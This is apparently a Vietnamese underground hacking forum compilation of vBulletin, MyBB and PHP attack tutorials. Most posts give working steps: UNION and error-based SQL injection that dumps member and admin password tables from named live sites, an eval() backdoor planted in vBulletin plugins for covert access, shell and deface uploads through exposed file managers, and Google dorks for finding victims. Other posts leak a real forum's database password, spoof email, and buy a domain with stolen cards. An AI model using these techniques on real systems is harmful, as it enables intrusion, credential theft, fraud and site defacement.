TUT UG (video) tổng hợp dành cho newbie

Tổng hợp bộ sưu tập TUT UG (video) dành cho newbie, anh em newbie có thời gian thì tải về nghiên cứu thử nhé
link:
http://www.mediafire.com/?pm55krbicizbc
 

[TUT] - Bảo mật cho Forum vBulletin

Phần I
Bài viết này Mafia viết thêm dựa trên tài liệu của shacker và một bài viết bằng tiếng Anh viết về bảo mật cho vbb. ok vào đề đi nào!

 

10 lưu ý bảo mật dữ liệu cho website

Bài này đc a Justom viết bên enhack
hum nay mình leech về để mọi người tham khảo thêm
10 lưu ý bảo mật dữ liệu cho website PHP sử dụng Shared hosting Linux Ngày nay các ứng dụng web với mã nguồn mở phát triển rất mạnh, trong đó đặc biệt phổ biến là PHP – MySQL. Nhưng công nghệ phát triển đồng thời kéo theo những “tin tặc” trẻ luôn muốn khẳng định mình sau khi xem những hướng dẫn tấn công, khai thác lỗi đầy rẫy trên các forum hacker. Vì thế bất kì một website nào cũng có khả năng bị tấn công bất cứ lúc nào, đặc biệt là các site cá nhân, tập thể vừa và nhỏ sẽ chọn giải pháp là thuê shared hosting trên một server. Vì các shared hosting ở cùng server nên độ riêng tư không cao, việc kiên cố hoá website trên shared hosting là rất cần thiết.

 

vBulletin Killer

 

[TUT] Bug validator.php trong vBulletin

TUT hướng dẫn bug tấn công vào icare.com.vn qua file Validator.php
Tác Giả: Nobody

Link down:


http://www.mediafire.com/?ntrngjdzczj
Đây cùng do sự bất cẩn của admin quên chưa xóa fle Validator.php file này có khả năng view hệ các file và thư mục của vBB.

 

Hidden Baby cho vBulletin (all version)

Screenshot:


http://s14.postimage.org/qfmtsljjj/Screen_shot_2012_06_25_at_21_35_24.png


Khả năng : Run query SQL tùy thích qua con backdoor (Select, Update, Drop ....)

Cách sử dụng

Quote:
+ Up thẳng vào thư mục forum vBB (ngang hàng với index.php).
+ Run: http://site.com/forum/backdoor.php?vnh= Câu lệnh sql

hoặc

+ Admincp -> Product & Plugin Manager -> Add new plugin ->
- Hook Location : tùy thích (mình hay dùng faq_complete)
- Plugin PHP Code : Copy nguyên code ở dưới vào, bỏ "<?php" ở đầu và "?>" ở cuối đi
- Plugin is active : Yes
+ Run : http://site.com/forum/faq.php?vnh= Câu lệnh sql
Download:
http://www.mediafire.com/?y9yz0gm6r4e4uxr
 Nguồn: VNHack.

 

[vBulletin] Admin Reset Tools - Công cụ dành cho Admin

Trong trường hợp bạn bị mất quyền Admin, mất hết Permission (hoặc bị thay đổi permission).

Công cụ này sẽ giúp bạn lấy lại group Admin và toàn quyền quản lí diễn đàn (Full Administrator Permission).

Demo:

http://i942.photobucket.com/albums/ad269/juno_okyo/Juno_okyo%20Blog/01.png

http://i942.photobucket.com/albums/ad269/juno_okyo/Juno_okyo%20Blog/02.png

http://i942.photobucket.com/albums/ad269/juno_okyo/Juno_okyo%20Blog/03.png

http://i942.photobucket.com/albums/ad269/juno_okyo/Juno_okyo%20Blog/04.png

Download:
File name: Admin-Reset-Tools.php
Password Unlock: junookyo

* Sử dụng:
Thay đổi thông tin DataBase như config.php của bạn:
// MySQL Info
    $host = 'localhost';
    $user = 'root';
    $password = '*****';
    $dbname = '*****'; 
Sau đó upload lên ngang hàng index forum và sử dụng.

P/S: Thực ra thì admin hoàn toàn có thể tự thay bằng cách vào phpMyAdmin, đây chỉ là công cụ giúp bạn khôi phục group Admin và toàn quyền quản lí Forum của mình nhanh nhất! :)

Nguồn: Junookyo !
 

[Report] ChangUonDyU Advanced Statistics - SQL injection

Mấy ngày nay DaiCa.Net đã bị kẻ lạ login vào account admin.
Tuy nhiên kẻ lạ mặt chưa làm gì được

Sau khi được juno_okyo Report là có bug tại mod Changuondyu Static.
Mình đã kiểm tra lại các input, tất cả các input chỉ có 1 input được đưa vào truy vấn, đó là
$_REQUEST['listforumid']

Và quả thật là có bug SQLi. Đây là 1 lỗi cực kỳ nghiêm trọng và sai xót của coder (Còn nghiêm trọng hơn Bug Search VBB vì rất nhiều người đang sử dụng mod này).

Từ Bug này, chúng ta có thể lấy được dữ liệu từ database => Login vào admin => Login vào admincp => Up shell => blah blah

Ở đây DuyK sẽ không nói đến cách khai thác để đề phòng "Hacker chẻ châu" quậy phá mọi người (Hacker thực sự sẽ hiểu vấn đề ngay nên khỏi cần phải nói)

Vì rất nhiều người đang sử dụng mod này và chưa fix nên DuyK hi vọng mọi người sẽ lan truyền report này.

Để fix mod này. Các bạn vào: Admincp -> Plugin & product option -> Plugin manage -> ChangUonDyU - Advanced Statistics - Get Data -> EDIT

Bạn tìm đến dòng:
$foruminid = $vbulletin->db->escape_string($_REQUEST['listforumid']);

Thay bằng:
$foruminid = intval($_REQUEST['listforumid']);

Report từ: DaiCa.Net - Forum newbie học hỏi

P/S by Juno_okyo:




Rất nhiều Diễn đàn đang sử dụng mod Statstics này nên mọi người nhanh chóng fix nhé.
Bug này được phát hiện từ mod tương tự của bác Chang cho MyBB, kiểm tra thì thấy mod bên vBB cũng dính.

 

vBulletin 2.0.3 Calendar.PHP Command Execution Vulnerability

Source: http://www.securityfocus.com/bid/5820/info

 
A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters.
 
An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system.
 
http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22
 
where <command> signifies a command to be executed on the system.

Nguồn: http://www.exploit-db.com/exploits/21874/

 

vBulletin 2.0/2.2.x Cross Site Scripting Vulnerabilities

Source: http://www.securityfocus.com/bid/5997/info

vBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks.
As a result, it is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user, in the context of the website running vBulletin.
This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software.
http://<victim>/usercp.php?s=[Session ID]"><Script>alert(document.cookie);</Script>

Nguồn: http://www.exploit-db.com/exploits/21946/


 

vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability

Source: http://www.securityfocus.com/bid/6337/info

Problems with vBulletin could make it possible for an attacker to inject arbitrary HTML in vBulletin forum messages.
vBulletin does not sufficiently filter potentially malicious HTML code from posted messages. As a result, when a user chooses to view a message posting that contains malicious HTML code, the code contained in the message would be executed in the browser of the vulnerable user. This will occur in the context of the site hosting the vBulletin forum software.
Attackers may potentially exploit this issue to manipulate web content or to steal cookie-based authentication credentials. It may be possible to take arbitrary actions as the victim user.
This should only be considered an issue if HTML has been enabled in messages. This option is not enabled by default and the vendor recommends that users do not enable it. If the option has been enabled, HTML will not be filtered at all.
*** This vulnerability has been further investigated. It has been reported by the vendor that this functionality is by disabled by default. Additionally, the risks of enabling this feature are documented in the user manual. Therefore, this is not a valid vulnerability, and will be removed from the SecurityFocus Vulnerability Database.
<b onMouseOver="alert(document.location);">Test!</b>

Nguồn: http://www.exploit-db.com/exploits/22077/


 

TUT SQL Statisics Forum MyBB


 

Hướng dẫn khai thác bug Changuondyu Static

Chú ý là đừng mang đi phá người ta quá nhé

Ở diễn đàn có sử dụng mod changuondyu static. Ví dụ: http://forumvictim.com/forum

Bạn truy cập vào: forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123

2 kái chữ bôi đỏ các bạn thay cho phù hợp (Ra ngoài forum home xem victim để giá trị result như nào, listforumid thì các bạn lấy 1 id chuyên mục của victim)

Tiếp theo bạn thử thêm dấu đóng ngoặc " ) " vào sau xem, nếu nó lỗi tức là site chưa fix


HTML Code:
http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123
Nếu đã lỗi rồi thì các bạn thực hiện order by để tìm column:

HTML Code:
http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) ORDER BY 11-- -
Bạn thay số 11 đỏ ở kia = số phù hợp, sao cho đó là số lớn nhất có thể mà khi đó ko bị lỗi (Thường thì là 10)

Giả sử mình đã tìm đc giá trị đó là 10 rồi thì tiếp theo sẽ select thôi.

HTML Code:
http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) UNION SELECT 1,group_concat(password),3,4,5,6,7,8,9,10 FROM user WHERE userid=1-- -
(Bạn có thể thử thay cái group_concat vào các số 6 hay 7 để hiển thị đc kquả tốt nhất)

Nếu xảy ra lỗi thì có thể forum này họ để VBB TABLE PREFIX, tức là table của họ ko phải dạng user nữa mà là kiểu như dct_user chẳng hạn, lúc này ta tìm tên table = cách:

HTML Code:
http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 FROM information_schema.tables-- -
=> Xem tiền tố table là gì rồi bắt đầu khai thác

Nguồn: DaiCa.Net - DaiCa.info - Newbie học hỏi
 

Xuất hiện mã khai thác từ xa lỗi 0-day mới của PHP 5.4.3 trên Windows

Vào hôm qua 18/05, một thành viên có nickname là 0in đã gửi lên trang packetstormsecurity.org một mã khai thác từ xa (remote exploit) lợi dụng lỗ hổng trong hàm com_print_typeinfo của PHP phiên bản 5.4.3 dành cho nền tảng Windows.
Trong phần ghi chú, 0in là tác giả của mã khai thác này cho biết, anh ta đã thử nghiệm thành công trên máy Windows XP SP3 được cập nhật đầy đủ các bản vá. Và kết quả là PHP engine sẽ thực thi bất kỳ shellcode nào được chứa trong mã khai thác này.

Hiện vẫn chưa có thông báo và bản vá lỗi chính thức nào từ nhóm phát triển PHP cho lỗi 0-day mới nhất này, nhưng dưới đây là một số biện pháp để hạn chế các rủi ro khác:

• Chặn tất cả các chức năng upload file trong các ứng dụng PHP.
• Sử dụng IPS để lọc các shellcode đã được biết đến, ví dụ các shellcode có trong Metasploit.
• Cập nhật PHP lên phiên bản mới nhất để phòng chống các lỗ hổng khác như CVE-2012-2336 được công bố vào đầu tháng này.
• Sử dụng Host-IPS để chặn bất kỳ các lỗi buffer overflow có thể có trong hệ thống.

(Theo Internet Storm Center (ISC))
Tham khảo:
http://isc.sans.edu/...PoC+in+the+wild
http://packetstormse...rg/files/112851

Nguồn: HVA

 

Google Hacking DataBase (GHDB)

Google Hacking involves using advance operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific ver- sions of vulnerable Web applications. The following search query would locate all web pages that have that particular text contained within them. It is normal for default installations of applications to include their running version in every page they serve, e.g., "Powered by XOOPS 2.2.3 Final".
The following search query will locate all websites that have the words "admbook" and "version" in the title of the website. It also checks to ensure that the web page being accessed is a PHP file:
intitle:admbook intitle:version filetype:php
Another technique is searching for insecure coding practices in the public code indexed by Google Code Search or other source code search engines. One can even retrieve the username and pass- word list from Microsoft FrontPage servers by inputting the given microscript in Google search field:
"#-Frontpage-" inurl:administrators.pwd
Devices connected to the Internet can be found. A search string such as inurl:"ViewerFrame?Mode =" will find public web cameras.

Footholds

Examples of queries that can help a hacker gain a foothold into a web server

(intitle:"SHOUTcast Administrator")|(intext:"U SHOUTcast D.N.A.S. Status")
(intitle:"WordPress › Setup Configuration File")|(inurl:"setup-config.php?step=")
"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )
"Please re-enter your password It must match exactly"
inurl:"tmtrack.dll?"
inurl:polly/CP
intitle:"net2ftp" "powered by net2ftp" inurl:ftp OR intext:login OR inurl:login
intitle:MyShell 1.1.0 build 20010923
intitle:"YALA: Yet Another LDAP Administrator"
intitle:"ERROR: The requested URL could not be retrieved" "While trying to retrieve the URL" "The following error was encountered:"
inurl:"phpOracleAdmin/php" -download -cvs
PHPKonsole PHPShell filetype:php -echo
filetype:php HAXPLORER "Server Files Browser"
inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx
(inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ")
intitle:"Web Data Administrator - Login"
"adding new user" inurl:addnewuser -"there are no domains"
PHP Shell (unprotected)
Public PHP FileManagers
+htpasswd +WS_FTP.LOG filetype:log
intitle:admin intitle:login

Files containing usernames

These files contain usernames, but no passwords... Still, google finding usernames on a web site...

site:extremetracking.com inurl:"login="
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
OWA Public folders & Address book
filetype:conf inurl:proftpd.conf -sample
filetype:log username putty
filetype:reg reg +intext:"internet account manager"
filetype:reg reg HKEY_CURRENT_USER username
+intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for"
inurl:php inurl:hlstats intext:"Server Username"
index.of perform.ini
"index of" / lck
inurl:admin filetype:asp inurl:userlist
inurl:admin inurl:userlist
sh_history files
bash_history files

Sensitive Directories

Google's collection of web sites sharing sensitive directories. The files contained in here will vary from sesitive to uber-secret!

allintext:"WebServerX Server at"
intitle:index.of ios -site:cisco.com
intitle:index.of cisco asa -site:cisco.com
intitle:index.of.config
allintitle:"FirstClass Login"
inurl:install.pl intext:"Reading path paramaters" -edu
"Warning: Installation directory exists at" "Powered by Zen Cart" -demo
"Welcome to the directory listing of" "NetworkActiv-Web-Server"
log inurl:linklint filetype:txt -"checking"
"Directory Listing for" "Hosted by Xerver"
intitle:"pictures thumbnails" site:pictures.sprintpcs.com
intitle:"Folder Listing" "Folder Listing" Name Size Date/Time File Folder
intitle:"Backup-Management (phpMyBackup v.0.4 beta * )" -johnny.ihackstuff
intitle:index.of WEB-INF
intitle:index.of /maildir/new/
filetype:ini Desktop.ini intext:mydocs.dll
filetype:torrent torrent
"Index of" rar r01 nfo Modified 2004
"Web File Browser" "Use regular expression"
intitle:"HFS /" +"HttpFileServer"
intitle:upload inurl:upload intext:upload -forum -shop -support -w3c
intitle:"index of" inurl:ftp (pub | incoming)
allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
intitle:index.of abyss.conf
intitle:"Index of /CFIDE/" administrator
"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )
intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org
intext:"Powered By: TotalIndex" intitle:"TotalIndex"
"intitle:Index.Of /" stats merchant cgi-* etc
intitle:"index of" intext:"content.ie5"
intitle:"index of" -inurl:htm -inurl:html mp3
index.of.dcim
intitle:"Directory Listing For" intext:Tomcat -int
intitle:"webadmin - /*" filetype:php directory filename permission
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
intitle:"Index of *" inurl:"my shared folder" size modified
intitle:index.of /AlbumArt_
intext:"d.aspx?id" || inurl:"d.aspx?id"
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
"index of" / picasa.ini
index.of.password


 

Chèn Backdoor vào VBB nhanh-gọn-nhẹ-hiệu quả

Hello, hnay DuyK sẽ hướng dẫn các bạn cách chèn 1 “cửa sau” vào VBB nhanh-gọn-nhẹ-hiệu quả:
Khi bạn đã login vào được admincp của 1 forum vbb nào đó, bạn muốn để lại 1 “cửa sau” trên website này 1 cách kín đáo nhất ?
Okê, chỉ cần 1 dòng đơn giản:

eval($_REQUEST['dct']);
Đầu tiên bạn cần truy cập vào: Plugin & product manager => Plugin manager => Tìm đến 1 plugin bất kì => EDIT => chèn dòng trên vào vị trí hợp lý (Nếu không hiểu lắm về cấu trúc php thì bạn có thể chèn vào đầu hoặc cuối)
Bạn cần chú ý vào “HOOK” mà bạn chèn. Bạn nào hiểu phần này thì okê rồi. Còn nếu bạn nào chưa hiểu thì hãy chọn những kái nào có hook là:
ajax_start => Sau khi chèn chỉ việc truy cập /forum_path/ajax.php?dct=(Code php)
global_start (ko biết có nhớ lộn ko) => Sau khi chèn chỉ việc truy cập /forum_path/forum.php?dct=(Code php) — (Hoặc có thể run bất kì file php nào, vì chèn vào global mà)
……………..Blah blah……………..
Code php bạn có thể chèn truy vấn SQL, readfile….
Ví dụ
?dct=$duyk=readfile(‘includes/class_core.php’); echo $duyk; => view file class_core.php
?dct=$duyk=mysql_fetch_array(mysql_query(“select password from user where userid=1″)); echo $duyk['password'];
……………..
Demo:


Với việc chèn “Cửa hậu” nhỏ gọn như vậy nhưng rất hiệu quả :D Bằng cách này chúng ta có 1 cửa cho riêng mình để vào “nhà” của victim 1 cách lén lút nhất
Nguồn: DaiCa.info


 

Share code nháy máy

Nguyên liệu:
- Acc Skype có balance
- Máy đã cài Skype + Apache + php 5.x
- Skype4COM: http://developer.skype.com/resources/Skype4COM.zip

Cách sử dụng:
- Giải nén Skype4COM.zip vào "C:\Program Files\Common Files\Skype\"
- Bật hộp thoại CMD gõ: REGSVR32 C:\Progra~1\Common~1\Skype\Skype4COM.dll xong ấn OK
- Bật Skype, Apache
cuối cùng là đê mô
Highslide JS
 

Khai thác site SQL HTML (php biến dạng)

Hôm nay mình làm cho ae cái tut mới

Khai thác sql không phải là php nữa mà là HTML

victim tìm cả đêm lần này là:
http://www.worldwidehealthcenter.net/articles-261.html

Thêm dấu ' vào sau những con số
http://www.worldwidehealthcenter.net/articles-261'.html

haha lỗi rồi


Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/whc/www/articles.php on line 16

Warning: Cannot modify header information - headers already sent by (output started at /home/whc/www/articles.php:16) in /home/whc/www/include.php on line 432

Bắt đầu order by
http://www.worldwidehealthcenter.net/articles-261 order by 1-- -.html >>ok
http://www.worldwidehealthcenter.net/articles-261 order by 7-- -.html >> ok
http://www.worldwidehealthcenter.net/articles-261 order by 8-- -.html >> bao loi

>>8-1=7 nhé

bây h union select :
http://www.worldwidehealthcenter.net/articles-261 union select 1,2,3,4,5,6,7-- -.html

ui số má đâu hết rồi: , view source , chẳng thấy gì hết chán.

Ghét quá thay số bằng null xem 261=null

http://www.worldwidehealthcenter.net/articles-null union select 1,2,3,4,5,6,7-- -.html

ui ra rồi 2 và 3 nhé

Tìm các thông tin :version(),database(),user()

http://www.worldwidehealthcenter.net/articles-null union select 1,2,version(),4,5,6,7-- -.html

Tiếp theo tìm table name
http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()-- -.html

1 đống :
adprice,artcat,articles,banners,brands,bulktemp,ca tegories,clickthrus,concerns,countries,directory,d irectorybak,directorystats,discount,distributorord er,emailaddresses,exchange,iptoc,keywords,loyalty, member,memberbak,memberbak2,message,ocountries,ord eritems,orders,ordersbak,postal,practcat,products, productsbak,purchaseorders,retaildiscount,ship,shi pdiscount,shipping,states,static,subscribers,suppl iers

Tìm table chứa thông tin

Ở đây nhìu cái quá mình loạn, thôi mình tìm table member nhé
member=0x6d656d626572 (conver to hex nhé)
get column

http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema=database() and table_name=0x6d656d626572-- -.html

lại ra 1 đống :
id,password,email,title,firstname,surname,company, address,city,state,postal,shoppercountry,tel,fax,s ameshipadd,shiptitle,shipfirstname,shipsurname,shi pcompany,shipaddress,shipcity,shipstate,country,sh ippostal,shiptel,shipfax,advertise,dateemailed,typ e

Tới đây là được rồi, mọi cái còn lại đơn giản , ae làm nhé


Tut by thanggiangho


======================================
Còn đây là site mà anh em tự chiến

http://mayxaydungquoctri.com/san-pha...matsu-117.html

Khai thác tương tự thử xem nhá
 

MyBB 0day \ MyTabs (plugin) SQL injection vulnerability

================================================== ===================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
================================================== ===================

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : skidforums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !

Vulnerability :

---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

Code:
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count,concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
$~ Get the administrator's password ~

Code:
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count,concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
Vài site để các bạn test:
Code:
http://icanhazcookie.net
http://edcmania.com
http://livedown.us
......
Thanks all


Nguồn: http://junookyo.blogspot.com/search/label/SQL%20Injection?updated-max=2012-09-21T21:06:00-07:00&max-results=20&start=20&by-date=false
 

Link Grabber | SQL Injection Scanner cho Chrome

 Download: 
Code:
http://www.mediafire.com/?77nct2ls738zxnd


Pass: sunflowercomeback

Hướng dẫn dùng:
Download -> Giải nén -> Mở Chrome -> Settings (Cài đặt) -> Extensions (Tiện ích mở rộng) -> Bật chế độ dành cho nhà phát triển (Dev Mode) -> Load extension... -> Chọn thư mục "source" vừa giải nén -> Restart lại Chrome --> Mở Google.com -> Điền dork muốn search -> Nhấn vào hình cái đầu lâu ở góc thanh địa chỉ (Nếu lần đầu không đc thì bạn nhấn lại lần 2)


Nguồn: http://junookyo.blogspot.com/search/label/SQL%20Injection?updated-max=2012-09-21T21:06:00-07:00&max-results=20&start=20&by-date=false
 

Reiluke Tools

Bộ Tool này gồm 14 em gồm các chức năng sau:
admin finder
blind Sqli
cpanel bruteforcer
duplicate remover
email brute
email checker
exploit scanner
php rapidshare checker
rapidshare checker
sms bomber
sqli column counter
sqliHelper 2.7
steam checker
Link Download:
http://www.mediafire.com/?g3a8eqqu614wzev


Nguồn: http://junookyo.blogspot.com/2012/09/reiluke-tools.html
 

Tut đâm domain Yahoo

NOTICE: Để ra mắt cả nhà với nhiệm vụ là admin mới  thì làm cái tut đâm em domain chơi ;)

Nguyên liệu: ccv đủ bl
Sock : cứ IP việt nam mà phang
Làm thôi nào:) đầu tiên vào trang này  http://smallbusiness.yahoo.com/domains

Sau đó làm theo trình tự nhé ;)







Như hình phía dưới là PED nhé :D còn ko thay con cc khác xem :-s mình thay 6 con :))

 
 

Bug tin nhắn FaceBook

Thực chất là fake mes thôi
php dưới

?php

$to 
'victim@facebook.com';$subject '';$message 'Hello, hacked by Duong';$header 'From: admin@binhduong-ug.com
Reply-To: admin@binhduong-ug.com'
;$mail mail($to,$subject,$message,$header);

if(
$mail) {
echo 
'Your Email was Sent Succesfully to '.$to;
}
?><hr />
<hr />
 

Share Code - data Guester.org 24/10/2012 FORUM UG

admin còn non trẻ quá


http://guester.org/


$config['Database']['dbname'] = 'break_1';


$config['MasterServer']['username'] = 'break_1';

$config['MasterServer']['password'] = 'sida123';

 code : http://www.mediafire.com/?uauzfl46nd35xaj
link data 24/10/2012 : http://www.mediafire.com/?iw5hwjjh3jj5x92
 

Tut UG - Verify phone call - cho ai chưa biết !

victim: http://tropo.com
1. anh em vào reg cái níc
2. Đăng nhập. Ấn vào Creat new Application

vào Tropo Scripting. Phần Tropo ScriptinApplication Name: chỉ là tên của app thôi nên điền tên j cũng được

Phần What URL powers your app? thì nháy vào Hosted File chọn Creat new sẽ hiện ra 1 khung và điền vào như sau:
Code:
Mã:

<?php
record("Please", array(
"beep"=>"true",
"timeout"=>10,
"silenceTimeout"=>7,
"maxTime"=>40,
"terminator" => "#",
"recordFormat" => "audio/mp3",
"recordURI" => "ftp://yourdomain.com/tropo.mp3",
"recordUser" => "xxxxxxx",
"recordPassword" => "yyyyyyy"
)
);
?>

3 dòng này thì a e tự điền vào domain của mình
Mã:

"recordURI" => "ftp://yourdomain.com/tropo.mp3",
"recordUser" => "xxxxxxx",
"recordPassword" => "yyyyyyy"

Nhìn là hiểu nhỉ .
Chức năng của đoạn code này là; lúc nó call đến verify, nó sẽ record và lưu về host của mình theo đúng đường dẫn của ftp.. nếu ghi như sau: ftp://thienthan8x.cu.to/tropo.mp3 mà host sd cpanel thì nó sẽ up lên ngay thư mục ngoài ngang hàng với public_html
chọn creat file



Tiếp theo Add a new phone number Chọn state a e muốn rồi add number

Sau đó ấn vào cái dòng có 1 dãy ký tự này rồi chọn Launch taken rồi đợi khoảng 1-2 phút là có thể sd được số phone vừa add kia. lúc verify xong thì lên host down file mp3 kia về nghe đoạn code thôi .
 

Add-on firefox fake sock+referal+clear cache,cookies

Nếu bạn thấy khó chịu khi lúc nào muốn fake ip bằng firefox mà cũng phải làm các bước lằng nhằng phức tạp:


tool ------> options ------------> advanced----------->Network-----------> settings---------->manual proxy.....

Hãy thay đổi cách làm việc của bạn. chỉ cần copy và paste socks thôi.

bạn sẽ loại bỏ được 6 bước phức tạp kia với addon của ff.
http://proxies.delicacyset.com/fireproxy.jsp

Fireproxy: https://addons.mozilla.org/firefox/d...dp-btn-primary

Phím tắt:
Shortcuts:

Alt + A - toggle on/off proxy state;
Alt + 1 - set HTTP(S) proxy type;
Alt + 2 - set SOCKS4 proxy type;
Alt + 3 - set SOCKS5 proxy type;
Alt + M - edit referrers;
Alt + C - clear cache;
Alt + R - remove browser and flash cookies;




ps: anh em có thể kiểm tra bằng cách vô lại các bước thông thường như trên thì thấy socks đã vô đúng vị trí.
 

Share Skin ĐCVN

Vui lòng để nguồn khi share lại skin
Skin RIP nên sẽ không support
Bạn nào cài có lỗi cứ post bài lên mình sẽ giúp

P/s: Đọc file huongdan.txt trong thư mục HUONG DAN để làm đúng nhất

Cảm ơn đã ủng hộ skinvbb.net

Download: http://www.mediafire.com/?42zkuivnzeiab29

Pass: skinvbb.net
 

[Share] PHP Yahoo Messenger Send PM

 

[Software] Tool Scan XSS


Mình download trên mạng có thể dính em bé mọi người thấy thích thì download về dùng


Tool scan XSS | Juno_okyo's Blog


http://www.mediafire.com/?crdx77ueotbh8u1
Pass download: vhb
 

WordPress MoodThingy Widget v0.8.7 Blind SQL Injection

# Exploit Title: WordPress MoodThingy Mood Rating Widget v0.8.7 Blind SQL Injection
# Date: 7/2/12
# Exploit Author: Chris Kellum
# Vendor Homepage: http://www.moodthingy.com/
# Software Link: http://downloads.wordpress.org/plugi...dget.0.8.7.zip
# Version: 0.8.7



=====================
Vulnerability Details
=====================

Input data from the form submission is not properly sanitized.

Using blind SQL injection techniques, true statements will result in the rating being updated, while false statements will cause the plugin to hang.

=================
Injection Example
=================

Using Burp Suite or other proxy, intercept the post request when submitting the form and append and 1=1 to the postID parameter before forwarding.

True statement example:

action=cast_vote&token=d9ad983425&moodthingyvote=6 &postID=6 and 1=1&results_div_id=voteresults

In the example above, the request will process successfully and the rating will be updated accordingly.

By replacing 1=1 with 1=0, the plugin will hang and the process will never successfully complete, giving you the necessary true/false conditions for blind sql injections.
 

HTML Editor File Upload Exploit

This is a exploit which can be used to upload .JPG and .TXT on the website
Dork: inurl:/HTMLEditor/editor/ 
         "inurl:/HTMLEditor/editor//filemanager/"
         "inurl:/HTMLEditor/editor//filemanager//connectors/"



Use any one above mentioned dork.

Vulnerable URL: http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
                        http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

Now under:
Select the "File Uploader" to use
Change the type to PHP.
Choose your file.
Click on Send it to the Server to upload your file.
If uploaded sucessfully, you will get a message saying "File uploaded
without any error" After the uploading process. In the right hand side
see the Uploaded File URL. From there see your uploded file :D




Demo website:
http://www.gofastrchobbies.com/imagesupload/cms_files/Hacking%20Exposed.png
 

"File Manager" Remote Shell and Deface Upload Vulnerability.

Following is the vulnerability to remotly upload your shell or deface on a vulnerable website.



Google Dorks:
inurl:/filemanager/userfiles/ filetype:pdf
inurl:/filemanager/index.html
Vulnerable URL:
http://www.site.com/filemanager/index.html
Now, google the dork and select any website from the search result.
When you will select any website, the URL will be as
http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
Now delete the text after filemanager. Now after deleteing the text URL will be
http://www.site.com/filemanager/
You will get a upload option, upload your shell or deface there.
Your will will be uploaded in Userfiles directory. z
To view your shell visit the below mentioned URLs:

http://www.site.com/UserFiles/Shell.php
http://www.site.com/UserFiles/deface.html
or 
http://www.site.com/UserFiles/directory/Shell.php
http://www.site.com/UserFiles/directory/deface.html
 

Eval() Vulnerability & Exploitation

File: Eval() Vulnerability & Exploitation
Author: GlaDiaT0R
Hits: 859
date: 2010-05-04


##############################################################################
# [+]Title: [Eval() Vulnerability & Exploitation]
##############################################################################
# [+] About :
##############################################################################
# Written by :  GlaDiaT0R  
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team :  Tunisian Power Team  ( DarkGh0st.Net )
##############################################################################
# [+]    Summary:
#           [1]-Introduction
#           [2]-Detection
#           [3]-Vulnerable Source code
#           [4]-Exploiting..
##############################################################################


[1]-Introduction

eval () is a PHP function that allows to interpret a given string as PHP code, because eval () is often used in Web applications,
although interpretation of the chain is widely liked manipulated, eval () serves most of the time to execute php code containing previously defined variable.
the problem is that if eval () executes a variable that you can modify the code contained by php eval () will execute as such.
Reminder: eval () allows execution of a given string as PHP code but not write (or if so desired) its content in this page or others, he is content to perform, and display the result.
We will even two different PHP source code using Eval (), the possibilities of PHP code injection and how how to use eval () can change the syntax of PHP code to execute.

=======================================================


[2]-Detection

PoC 1 :

http://www.vulnsite.com/evalinject.php?ev=<? phpinfo(); ?>

[ eval() execute the contents of the variable "ev" as PHP code ]

----------

PoC 2 :

http://www.vulnsite.com/evalinject.php?ev=phpinfo();

[ eval() execute the contents of the variable "ev" as PHP code (without tags) ]

----------

PoC 3 :

Changing the header or POST variable cited by: phpinfo () [or <? phpinfo ();> php code used . ]
(With the Tamper Data)

[ eval () execute a chain whose variable $ HTTP_USER_AGENT is so just
change your header in PHP code ]

=======================================================


[3]-Vulnerable Source code

PoC 1 :

<?php
$Ev = $_GET['ev'];
$string = ($Ev);
$string = preg_replace_callback("/(<\?=)(.*?)\?>/si",create_function('$string','ob_start();eval("$string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
